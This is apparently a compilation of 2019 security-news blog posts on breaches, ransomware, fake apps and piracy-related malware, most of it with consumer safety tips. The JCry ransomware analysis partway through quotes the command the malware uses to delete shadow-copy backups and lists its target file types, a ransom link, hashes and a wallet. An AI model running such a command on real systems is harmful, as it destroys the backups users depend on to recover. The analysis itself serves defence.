Medical Format Flaw Can Let Attackers Hide Malware in Medical Images

Research into DICOM has revealed that the medical file format in medical images has a flaw that can give threat actors a new way to spread malicious code through these images.

Hackers Could Read Your Hotmail, MSN, and Outlook Emails by Abusing Microsoft Support

A hacker or group of hackers broke into a customer support account for Microsoft, and then used that to gain access to information related to customers’ email accounts such as the subject lines of their emails and who they’ve communicated with.

New Business Email Compromise Scheme Reroutes Paycheck by Direct Deposit

A new business email compromise (BEC) scheme, where the attacker tricks the recipients into rerouting paychecks by direct deposit, has emerged.

Leadership Turnover at DHS and Secret Service Could Hurt US Cybersecurity Plans

Departures of top officials at the Secret Service and Department of Homeland Security (DHS) will add to an already difficult public-private disconnect on cybersecurity, especially since Kirstjen Nielsen has a rare set of cybersecurity skills that helped the DHS protect companies in critical industries.

Microsoft Disclosed Security Breach From Compromised Support Agent’s Credentials

Microsoft has notified affected Outlook users of a security breach that allowed hackers access to email accounts from January 1 to March 28, 2019.

Do you think the leadership turnover at DHS and the Secret Service will hurt US cybersecurity plans? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Medical Malware and Monitor Hacks appeared first on .

Smashing Security #124: Poisoned porn ads, the A word, and why why why Wipro?

Smashing Security #124: Poisoned porn ads, the A word, and why why why Wipro?

The hacker who lived the high life after spreading malware via porn sites, Wipro demonstrates how to turn a cybersecurity crisis into a PR disaster, and why are humans listening in to your Alexa conversations?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guest Brian Honan.

How do I stop old USB drives from infecting my new Windows PC?

Jason wants to protect his new high-end laptop from viruses but needs data on old SD cards

I’ve just bought a high-end Windows laptop for video editing while travelling around Europe. What steps can I take to prevent any possible infections from being passed on from previous machines on SD cards and external hard drives? Some of the external hard drives go back to machines from 2004 but I have never plugged any of them into any computers other than my own previous Macs and PCs. I work professionally with video, photography and coding, so all of this data is vital.

I have a five-machine Bitdefender licence but I’d be prepared to use another protection system, and I’ve looked at Sophos Intercept X. Jason

There are at least three things to think about. First, there’s the threat level: how at risk are you? Second, there’s provenance: how much do you know about your devices? Third, how can you mitigate any risks revealed by the answers to the first two questions?

Continue reading...

Cyber News Rundown: Tax Extortion Ransomware Scams Corporations

Reading Time: ~2 min.

Tax Extortion Emails Bring Major Threats

A new email campaign has been spotted threatening ransomware and DDoS attacks over fake tax documents allegedly held by the attackers if a Bitcoin ransom isn’t paid. The campaign authors also threaten to send fake tax documents to the IRS through a poorly-worded ransom email that even provides Wikipedia excerpts for each threat put forward. Fortunately, as the campaign seems to be focused on corporations rather than individuals, no payments have been made to the attacker’s crypto coin wallet address.

Hotel Reservation Data Leaking Through Third-Party Services

As major data breaches continue to flood headlines, a recent study has revealed that nearly two of every three hotels exposes information about its guests to third-parties. Excerpts of the data show names, social security numbers, and payment card details that could give unauthorized users the ability to compromise identities or make changes to current reservations. Most of the exposed data involves comping through third-party services run on hotel websites offering customers additional packages.

Ransomware Conspirator Jailed in the UK

Police in the UK have officially charged and jailed a man for his part in the operation of a global ransomware campaign with ties to a Russian criminal organization. Charges range from fraud and blackmail to computer misuse relating to DDoS attacks and the Essex man is set to face at least six years. By masquerading as an advertising agent looking to purchase ad space on high-traffic sites, he was able to infect ad links with malware and other exploits to spread his campaign.

Firefox Begins Blocking Cryptomining Scripts

Even after the demise of CoinHive, cryptomining scripts are still being secretly deployed on thousands of websites without the knowledge of their owners and visitors. With the release of Firefox 67 beta, Mozilla is hoping to completely protect their users from malicious scripts that download and run cryptominers and other unwanted tracking software by using a blacklist created by Disconnect, a VPN developer with a reputation for privacy protection. Additionally, the new Firefox version will block fingerprinting scripts commonly used to invade a user’s browsing privacy.

MyCar App Uses Hardcoded Credentials

Thousands of cars were left vulnerable after a widely used vehicle telematics systems was found to be using hardcoded credentials in their mobile apps. Used in dozens of different car models to enable remote control functions, the hardcoded credentials leave these vehicles accessible to anyone with the app’s source code and the plaintext credentials within. Fortunately for users, the latest iOS and Android versions of the MyCar app have been updated to resolve this vulnerability.

The post Cyber News Rundown: Tax Extortion Ransomware Scams Corporations appeared first on Webroot Blog.

Excited about the Final Season of Game of Thrones? Be Careful Where You Watch It!

All Game of Thrones fans know it by now – the long-awaited final season is starting on Sunday, April 14th. While you may be overly excited to watch it, you may also be tempted to stream it online for free or resort to torrent websites and download it illegally.

By turning to these resources you are not only breaking copyright laws but possibly your computer as well.

According to the anti-malware researcher Muso, almost 190 billion visits were made to illegal piracy websites in 2018. Nearly half of these people visited the websites in search for television shows, and almost one in five visitors were looking for the latest movie.

Two years ago, before Season 7 of Game of Thrones was released, over 10 million Americans were planning to watch it illegally, and it would be safe to assume the numbers would look equally shocking this year.

Winter is coming, but so is malware

We decided to take a look at what domains our users have tried to access in the past two weeks, to see what type of content Thor Foresight blocked. We investigated all the domains containing keywords related to TV and videos in general.

Below you can see the keywords we looked at. The percentages were calculated out of the total number of TV and video-related keywords.

Thor Blocked Domains April0

Source: Heimdal Security Threat Intelligence Data

According to another recent report, the number of users who ran into TV shows-related malware in 2018 is one-third less than in 2017. But the rest of the findings don’t fall on the bright side at all. Interestingly enough, although there was a one-year gap between Season 7 and Season 8, Game of Thrones was the top target for malware in 2018.

This show alone was accounted for 17% of all the infected pirated content in 2018, with almost 21,000 users attacked.

Where did malicious actors hide the largest number of infected files? Obviously, in the first and last episodes of each season of Game of Thrones, since you are most likely not to miss these.

The same research showed Trojan was the most frequent malware type.

So what can happen if you watch TV shows and movies illegally?

Let’s go through some of the recently discovered security threats in the realm of torrents.

At the beginning of January 2019, a malicious Windows shortcut file was discovered on The Pirate Bay torrent tracker. It injected content from the attacker into browsers and altered search results from Google and other search engines or Wikipedia, also trying to steal cryptocurrency. The malware was hiding in files for the movie The Girl in the Spider’s Web.

At first glance, it looked like just some annoying adware, but after taking a closer look, researchers found the malicious activity is extending to webpages and on Wikipedia entries. The attackers are monitoring websites for Bitcoin and Ethereum wallet addresses, looking to replace them with the ones of the attacker.

On Google, the malware creates fake ads on the top search results. And when searching for certain terms, such as “spyware”, the first two results take you to a cybersecurity solution called “Total AV”.

image1 2


What’s more, attackers have also created a Wikipedia donation scam, where they insert a fake banner that says Wikipedia now also accepts cryptocurrency donations. For more details, you can read the full story here.

The chain of recent malware events associated with torrent websites doesn’t stop here.

In March 2019, the “PirateMatryoshka” scheme was also brought to light.

What did the torrent files contain? Instead of the software you were hoping to download from The Pirate Bay, you would come across a Trojan, which was disguised as genuine software. If you were to install it onto your computer, you’d ended up buried in adware. This doesn’t stop here, as additional installers can be introduced to bring even more malware and wreak havoc into your PC.

The easy way to protect yourself against malware
Here's 1 month of Thor Foresight Home, on the house!
Use it to: Block malicious websites and servers from infecting your PC Auto-update your software and close security gaps Keep your financial and other confidential details safe


Try Thor Foresight

Traps can be hidden anywhere

Unfortunately, malicious actors are finding more and more ways to attack you. It seems they are now also relying on popular search terms to infiltrate into your system.

Even searching for your favorite actor’s name could result in some unwanted results. For example, returns for “Emilia Clarke” are among those most likely to be infected with malware, according to a recent study. By clicking on these results, users are tricked into visiting malicious websites. What these websites can do is steal passwords or other personal info.

Malware could be hiding anywhere when you try to watch your favorite TV show illegally. To be one step ahead of cybercriminals, we recommend you also read our in-depth explanation:

Here are also a few key pieces of advice to keep in mind before watching Game of Thrones:

Never access suspicious links that promise you leaked episodes or exclusive early premieres.

Always look up the TV show’s episodes release dates. If something looks too good to be true, it probably is. Here is the Game of Thrones Season 8 complete schedule (the official US release dates):

  • Episode 1: April 14, 2019
  • Episode 2: April 21, 2019
  • Episode 3: April 28, 2019
  • Episode 4: May 5, 2019
  • Episode 5: May 12, 2019
  • Episode 6: May 19, 2019

Ditch the torrents and illegal streaming websites.

Here is what you can do instead:

  • Use subscription-based services, such as HBO Go or HBO Now, Hulu, Amazon, Playstation Vue, or Roku.
  • Download the episodes on iTunes, Google Play, or Amazon Prime. Yes, these options are pricier than using subscriptions, but if you don’t want to be committed to a subscription that’s perfectly fine.
  • If these services are not available in your current region, you can consider using a VPN. A VPN deals with these issues and on top of that, it’s crucial for online security. For instance, a VPN can provide good protection against man-in-the-middle attacks. In this case, someone could intercept your online traffic, and the data you think you share securely (for example, financial data) could be easily deciphered by hackers.
  • Beware of illegal streaming services that may look legit and could ask for your money just like a normal streaming service would!

Apply software updates constantly.

We can’t stress this enough – lack of updates create security holes that can be easily exploited by hackers.

Use an anti-malware solution to secure your digital life.

Thor Premium offers you protection in front of the most advanced malware threats and blocks them before they can reach your PC.

Final Words

Are the risks of watching TV shows and movies illegally actually worth it? We warned you, but it’s your decision to make.

Meanwhile, until the first episode of season eight is out, enjoy this version of GoT’s soundtrack, played by an old computer hardware orchestra:

What are your thoughts on online piracy? How are you planning to watch the final season of Game of Thrones? Share your comments in the section below.

The post Excited about the Final Season of Game of Thrones? Be Careful Where You Watch It! appeared first on Heimdal Security Blog.

New Version of Flame Malware Discovered

Flame was discovered in 2012, linked to Stuxnet, and believed to be American in origin. It has recently been linked to more modern malware through new analysis tools that find linkages between different software.

Seems that Flame did not disappear after it was discovered, as was previously thought. (Its controllers used a kill switch to disable and erase it.) It was rewritten and reintroduced.

Note that the article claims that Flame was believed to be Israeli in origin. That's wrong; most people who have an opinion believe it is from the NSA.

High-rolling hacker jailed after launching malware attacks via websites

A British man has been jailed for over six years after exploiting ad networks on pornographic websites to spread malware onto innocent users' computers.

The post High-rolling hacker jailed after launching malware attacks via websites appeared first on The State of Security.

TajMahal Spyware

Kaspersky has released details about a sophisticated nation-state spyware it calls TajMahal:

The TajMahal framework's 80 modules, Shulmin says, comprise not only the typical keylogging and screengrabbing features of spyware, but also never-before-seen and obscure tricks. It can intercept documents in a printer queue, and keep track of "files of interest," automatically stealing them if a USB drive is inserted into the infected machine. And that unique spyware toolkit, Kaspersky says, bears none of the fingerprints of any known nation-state hacker group.

It was found on the servers of an "embassy of a Central Asian country." No speculation on who wrote and controls it.

More details.

The scourge of stalkerware


Stalkerware. Software that allows someone else to spy upon every SMS text message you send or receive, who you’re speaking to on your smartphone phone, the pictures in your photo library, every social media post you make, your current location, and where you go and when.

The EFF’s Eva Galperin calls on the security industry to take stalkerware more seriously.

Malware Infected Medical Equipment Shows Fake Tumors

Israeli cybersecurity researchers have created malware capable of showing fake cancerous growths on CT and MRI scans.

The malware, called CT-GAN, served as a proof of concept to show the potential for hacking medical devices with fake medical news that was convincing enough to fool medical technicians. In a video demonstrating the exploit, researchers at Ben Gurion University described how such an attack might be deployed.

“Attacker[s] can alter 3D medical scans to remove existing, or inject non-existing, medical conditions. An attacker may do this to remove a political candidate / leader, sabotage / falsify research, perform murder / terrorism, or hold data ransom for money.”

In a blind study, CT-GAN had a 99% success rate in deceiving radiologists with fake cancer nodules, and a 94% success rate in hiding actual cancer nodules.

Medical facilities are frequently targeted by hackers, due in part to their reliance on networking technologies and their archives of sensitive personal information. A recent study showed that 1 in 4 healthcare facilities were hit by ransomware in 2018 alone.

Click here to see the original report describing the malware findings.   

The post Malware Infected Medical Equipment Shows Fake Tumors appeared first on Adam Levin.

UK hacker jailed for six years for blackmailing pornography site users

Zain Qaiser targeted millions of computers with ransomware demanding large sums

A hacker who blackmailed users of pornography websites in what investigators say is the UK’s most serious cybercrime case has been jailed for six years and five months.

Zain Qaiser targeted millions of computers with malicious browser-locking software that demanded payment of up to $1,000 (£765) to unfreeze screens, Kingston crown court heard.

Continue reading...

JCry – A Ransomware written in Golang!

Estimated reading time: 4 minutes

For several months, QH Labs has been observing an upswing in ransomware activity. We found a new ransomware which is written in Go lang. Malware authors are finding it easy to write ransomware in Go lang rather than traditional programming languages.

Infection of Jcry ransomware starts with a compromised website.

As shown in the above image, malware author tries to impersonate users by pretending to be an update of Adobe flash player and download malware on the user’s machine. Fig 1. contains a part of javascript hosted on the compromised domain, which downloads a malicious file from the given URL. Whenever an impersonated user clicks on the Update button and executes a malicious file with the intention of updating the flash player, malware starts its execution.

Fig 1 : Part of malicious script.

Flow of Execution:

Technical Analysis:

Downloaded malware (flashplayer_install.exe) is Self-extracting archive. On execution, it will extract the below mentioned components in “Startup” directory to create its persistence.


  1. msg.vbs
  2. Enc.exe
  3. Dec.exe

Fig 2 : Extracted components and SFX instructions.

As mentioned in the above figure malware extract components and starts msg.vbs along with enc.exe(Encryptor)


This file is used to impersonate the user that, the system tried to update adobe flash player but access is denied for the user.

Fig 3 : Message shown by msg.vbs

Enc.exe (Encryptor):

This executable is responsible for file encryption and it is written in Go language.

Fig 4 : Go Build ID and library strings of Go Lang found in file.

On execution, it firstly checks for the existence of “personalKey.txt” file in the current directory, to determine that system is already infected or not. If the file exists then malware considers that the system is already infected and it terminates itself. As well as it deletes msg.vbs and Enc.exe with the help of decryptor file. During encryption, it uses the combination of AES and RSA algorithm. File encryption is performed using AES 128 bit algorithm with 16-byte initialization Vector in CBC mode. Hardcoded RSA public key is found in the enc.exe file which is later used to encrypt AES key.



Fig 6: Acquire Context for Crypto operations.

It encrypts the below listed 138 extension files.

“3dm, 3ds, 3g2, 3gp, 7z, ai, aif, apk, app, asf, asp, avi, b, bak, bin, bmp, c, cbr, cer, cfg, cfm, cgi, cpp, crx, cs, csr, css, csv, cue, dat, db, dbf, dcr, dds, deb, dem, der, dmg, dmp, doc, dtd, dwg, dxf, eps, fla, flv, fnt, fon, gam, ged, gif, gpx, gz, h, hqx, htm, ics, iff, iso, jar, jpg, js, jsp, key, kml, kmz, log, lua, m, m3u, m4a, m4v, max, mdb, mdf, mid, mim, mov, mp3, mp4, mpa, mpg, msg, msi, nes, obj, odt, otf, pct, pdb, pdf, php, pkg, pl, png, pps, ppt, ps, psd, py, rar, rm, rom, rpm, rss, rtf, sav, sdf, sh, sln, sql, srt, svg, swf, tar, tex, tga, thm, tif, tmp, ttf, txt, uue, vb, vcd, vcf, vob, wav, wma, wmv, wpd, wps, wsf, xlr, xls, xml, yuv, zip”

To speed up the encryption, it encrypts only 1MB data for files of size more than 1 MB. After successful file encryption it appends “.jcry” extension to the filename.

Fig 7:Encrypted files with jcry Extension.

After encryption of files, it deletes all shadow copies with the help of the below command.

                                                                  “vssadmin delete shadows /all”

and launch Dec.exe using Powershell command.

Fig 8: Vssadmin and PowerShell execution.


On execution of Dec.exe firstly it terminates and deletes enc.exe. Dec.exe is console application which asks the decryption key (RSA private key). After entering valid key it may decrypt encrypted files.

Fig 9 : Dec.exe.

It also drops ransom note on desktop location. To recover encrypted files it demands for 500$ as ransom and provides onion link (hxxp://kpx5wgcda7ezqjty.onion) where infected user will get private key after payment.

Fig 10: Ransom Note.



flashplayer_install.exe: c86c75804435efc380d7fc436e344898
Enc.exe : 5B640BE895C03F0D7F4E8AB7A1D82947
Dec.exe : 6B4ED5D3FDFEFA2A14635C177EA2C30D
Recovery Link: hxxp://kpx5wgcda7ezqjty.onion
Wallet Id: 1FKWhzAeNhsZ2JQuWjWsEeryR6TqLkKFUt


Prevention tips:

  1. Regularly take a backup of your important data in external drives like HDD, pen drive or Cloud storage.
  2. Install an antivirus and keep it updated.
  3. Keep your Operating System and software up-to-date.
  4. Never click on links or download attachments from any unknown or unwanted sources.

Subject Matter Expert:

Nagesh lathakar, Pratik Pachpor | Quick Heal Security Labs

The post JCry – A Ransomware written in Golang! appeared first on Seqrite Blog.

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

Cyber News Rundown: Massive Data Breach at Georgia Tech

Reading Time: ~2 min.

Massive Data Breach at Georgia Tech

It was recently revealed that the personal information on over 1.3 million people was illicitly accessed by hackers who breached Georgia Tech systems in December of last year. The breach is the second of the year for the university, and was only discovered after IT staff noted performance issues on a widely used web application that interacts with a major database for both students and staff. 

Restaurant Firm Admits to Data Breach

Earl Enterprises, the parent firm of several popular restaurants around the country, recently announced they had fallen victim to a point-of-sale breach at multiple restaurant locations over the last 10 months. At least 100 restaurants, including all locations of the Italian chain Buca di Beppo, have begun working on restoring their systems and contacting affected customers. Nearly 2.1 million payment card accounts have been found in a dark web marketplace that were posted just a month before the company made its discovery.

Toyota Confirms Sales Data Breach

Personal information for over 3.1 million individuals may have been compromised before officials found signs of unauthorized activity on an internal network used in multiple sales subsidiaries of Toyota and Lexus. While the company’s dealerships continue to provide service and parts to customers, this specific breach comes only a month after another cyber attack that impacted Toyota dealerships in Australia, leaving many customers worried about the safety of their data.

GPS Watches Display PWNED! Message

Nearly a year after researchers contacted the watch maker Vidimensio about multiple vulnerabilities in their GPS watches, a new message has appeared on watch maps. The phrase “PWNED!” has been seen on at least 20 different watch models as a message alerting the company to their poor security infrastructure, as end-users are susceptible to being tracked through their watches. More alarmingly, many of the devices were found to have this vulnerability after Germany passed a law banning smart-watches for children that were capable of remote-listening after it was found they often ran on unpatched firmware.

Ransomware Strikes Albany, NY

The city of Albany, New York has been working to restore normal operations after a ransomware attack took down several key components of its systems. Aside from a few document-specific requests, however, the vast majority of the functionality was left undisturbed throughout the attack and recovery process. According to officials, all public safety services remained fully operational and had staff working around the clock to continue to provide assistance or direct individuals to a working facility.

The post Cyber News Rundown: Massive Data Breach at Georgia Tech appeared first on Webroot Blog.

This Week in Security News: IIoT Threats and Malware Apps

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about security threats directed at smart manufacturing environments. Also, learn why malware installed from the Android app store increased by 100% last year.

Read on:

Security in the Era of Industry 4.0: Dealing With Threats to Smart Manufacturing Environments

As manufacturing companies continue to adopt Industry 4.0, many environments could still be falling short on security that leave them vulnerable to attacks. 

Arizona Beverages Hacked in Targeted Ransomware Attack: Report

Arizona Beverages is recovering from a ransomware infection that recently compromised scores of Windows servers and computers and effectively shut down sales operations for days. 

Android Security: Click Fraud Apps Drove 100% Malware Increase in Google Play for 2018

Security issues are no stranger to apps found on Google’s Play Store. Malware installed from the Android app store grew by 100 percent in 2018 due to click fraud apps. 

Capture the Flag Competitions Can Help Close the Security Skills Gap

Members of the security teams at IBM Collaboration Solutions (ICS) and Industry Solutions, made a great impression when they spoke about capture the flag (CTF) events they were building for students and the IT industry.

Health Information of 350,000 Oregon DHS Clients Exposed After Phishing Attack

The Oregon Department of Human Services (DHS) recently notified the public that the personal health information of over 350,000 clients had been exposed due to a phishing attack.

Vehicles and Mobility Services to be Secured Against Cyber-Attacks by Partners Trend Micro and Luxoft

Trend Micro and Luxoft are jointly introducing and deploying an Intrusion Detection System (IDS), designed to detect, mitigate and respond to cyber-attacks on connected cars. 

Desktop, Mobile Phishing Campaign Targets South Korean Websites, Steals Credentials Via Watering Hole

Trend Micro discovered a phishing campaign that has compromised at least four South Korean websites by injecting fake login forms to steal user credentials. 

Toyota Data Breach Affects Up to 3.1 Million Customers

Automotive maker Toyota announced that a data breach had hit its sales offices in Japan, exposing information on up to 3.1 million customers. 

Bashlite IoT Malware Updated with Mining and Backdoor Commands, Targets WeMo Devices

Trend Micro uncovered an updated Bashlite malware designed to add infected internet-of-things devices to a distributed-denial-of-service (DDoS) botnet.

New Version of XLoader That Disguises as Android Apps and an iOS Profile Holds New Links to FakeSpy

In previous attacks, XLoader posed as Facebook, Chrome and other apps to trick users into downloading its malicious app. Trend Micro researchers found a new variant that uses a different way to lure users. 

Are you surprised to learn that there was a 100% malware increase in Google Play for 2018? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: IIoT Threats and Malware Apps appeared first on .

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home

Like most parents, before you go to sleep each night, you take extra care to lock doors and windows to keep your family safe from any outside threats. The only thing you may have overlooked is the smartphone illuminated on your nightstand. And if you were to add up the smartphones humming all over your house, suddenly you’d have a number of unlocked doors that a determined criminal could enter through. Maybe not tonight — but eventually.

Digital Ecosystem

Over time you’ve purchased and plugged in devices throughout your home. You might have a voice assistant, a baby monitor, a thermostat, a treadmill, a gaming system, a fitness watch, smart TVs, a refrigerator, and many other fun, useful gadgets. Each purchase likely connects to your smartphone. Take stock: You now have a digital ecosystem growing all around you. And while you rarely stop to take notice of this invisible power grid around you, hackers can’t stop thinking about it.

This digital framework that pulsates within your home gives cybercriminals potential new entryways into your life and your data. Depending on your devices, by accessing your smartphone, outsiders may be able to unlock your literal doors while you are away (via your home security system), eavesdrop on your family conversations and collect important information (via your voice assistant), access financial information (via your gaming system, tablet, or laptop).

What you can do:

  • Change factory security settings. Before you fire up that smart TV, drone, or sound system, be sure to change each product’s factory settings and replace it with a bulletproof password to put a layer of protection between you and would-be hackers.
  • Protect your home network. We are connected people living in connected homes. So, part of the wired lifestyle is taking the lead on doing all we can to protect it. One way to do that is at the router level with built-in network security, which can help secure your connected devices.
  • Stay on top of software updates. Cybercrooks rely on consumers to ignore software updates; it makes their job so much easier. So be sure to install updates to your devices, security software, and IoT products when alerted to do so.

Smartphone = Front Gate

The most common entry point to all of these connected things is your smartphone. While you’ve done a lot of things to protect your phone — a lock screen, secure passwords on accounts, and system updates — there are hacking tactics you likely know nothing about. According to McAfee’s recent  Mobile Threat Report, you don’t know because the scope and complexity of mobile hacks are increasing at alarming rates.

Hidden Apps

The latest statistics report that the average person has between 60-90 apps installed on their phones. Multiply that between all the users in your home, and you are looking at anywhere from 200-500 apps living under your digital roof. Hackers gravitate toward digital trends. They go where the most people congregate because that’s where they can grab the most money. Many of us control everything in our homes from our apps, so app downloads are off the charts, which is why crooks have engineered some of their most sophisticated schemes specifically around app users.

Hidden apps are a way that crooks trick users into letting them inside their phones. Typically, hidden apps (such as TimpDoor) get to users via Google Play when they download games or customized tools. TimpDoor will then directly communicate with users via a text with a link to a voice message that gives detailed instructions to enable apps from unknown sources. That link downloads malware which will run in the background after the app closes. Users often forget they’ve downloaded this and go on with life while the malware runs in the background and can access other internal networks on the smartphone.

What you can do:

  • Stay alert. Don’t fall for the traps or click links to other apps sent via text message.
  • Stay legit. Only download apps hosted by the original trusted stores and verified partner sites.
  • Avoid spam. Don’t click on any email links, pop-ups, or direct messages that include suspicious links, password prompts, or fake attachments. Delete and block spam emails and texts.
  • Disable and delete. If you are not using an app, disable it. And, as a safety habit, remove apps from your phone, tablet, or laptop you no longer use.

Fake Apps

Again, crooks go where the most people congregate, and this year it is the 60 million+ downloaded game Fortnite. The Fortnite craze has lead hackers to design fake Fortnite apps masquerading as the real thing. The fraudulent app designers go to great lengths to make the download look legitimate. They offer enticing downloads and promise users a ton of free perks and add ons. Once users download the fake app, crooks can collect money through ads, send text messages with more bad app links, crypto jack users, or install malware or spyware.

What you can do:

  • Don’t install apps from unknown sources. Not all gaming companies distribute via Google Play or the App Store. This makes it even harder for users to know that the app they are downloading is legit. Do all you can to verify the legitimacy of the site you are downloading from.
  • Delete suspicious acting apps. If you download an app and it begins to request access to anything outside of its service, delete it immediately from your device.
  • Update devices regularly. Keep new bugs and threats at bay by updating your devices automatically.
  • Monitor bank statements. Check statements regularly to monitor the activity of the card linked to your Fortnite account. If you notice repeat or multiple transactions from your account or see charges that you don’t recognize, alert your bank immediately.
  • Be a savvy app user. Verify an app’s legitimacy. Read other user reviews and be discerning before you download anything. This practice also applies to partner sites that sell game hacks, credits, patches, or virtual assets players use to gain rank within a game. Beware of “free” downloads and avoid illegal file-sharing sites. Free downloads can be hotbeds for malware. Stick with the safer, paid options from a reputable source.

The post Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home appeared first on McAfee Blogs.

How Online Scams Drive College Basketball Fans Mad

Sports fans everywhere look forward to mid-March for the NCAA men’s college basketball tournament. However, it’s not just college basketball fans that look forward to this time of year. Cybercriminals use March to launch malicious campaigns in the hopes of gaining access to personal information from unsuspecting fans. Let’s take a look at the most popular techniques cybercriminals use to gain access to passwords and financial information, as well as encourage victims to click on suspicious links.

Online betting provides cybercriminals with a wealth of opportunities to steal personal and financial information from users looking to engage with the games while potentially making a few extra bucks. The American Gaming Association (AGA) estimates that consumers will wager $8.5 billion on the 2019 NCAA men’s basketball tournament. What many users don’t realize is that online pools that ask for your personal and credit card information create a perfect opportunity for cybercriminals to take advantage of unsuspecting fans.

In addition to online betting scams, users should also be on the lookout for malicious streaming sites. As fewer and fewer homes have cable, many users look to online streaming sites to keep up with all of the games. However, even seemingly reputable sites could contain malicious phishing links. If a streaming site asks you to download a “player” to watch the games, there’s a possibility that you could end up with a nasty malware on your computer.

Ticket scammers are also on the prowl during March, distributing fake tickets on classified sites they’ve designed to look just like the real thing. Of course, these fake tickets all have the same barcode. With these scams floating around the internet, users looking for cheap tickets to the games may be more susceptible to buying counterfeit tickets if they are just looking for the best deal online and are too hasty in their purchase.

So, if you’re a college basketball fan hoping to partake in this exciting month – what next? In order to enjoy the fun that comes with the NCAA tournament without the risk of cyberthreats, check out the following tips to help you box out cybercriminals this March:

  • Verify the legitimacy of gambling sites. Before creating a new account or providing any personal information on an online gambling website, poke around and look for information any legitimate site would have. Most gambling sites will have information about the site rules (i.e., age requirements) and contact information. If you can’t find such information, you’re better off not using the site.
  • Be leery of free streaming websites. The content on some of these free streaming websites is likely stolen and hosted in a suspicious manner, as well as potentially contains malware. So, if you’re going to watch the games online, it’s best to purchase a subscription from a legitimate streaming service.
  • Stay cautious on popular sports sites and apps. Cybercriminals know that millions of loyal fans will be logging on to popular sports sites and apps to stay updated on the scores. Be careful when you’re visiting these sites you’re not clicking on any conspicuous ads or links that could contain malware. If you see an offer that interests you in an online ad, you’re better off going directly to the website from the company displaying the ad as opposed to clicking on the ad from the sports site or app.
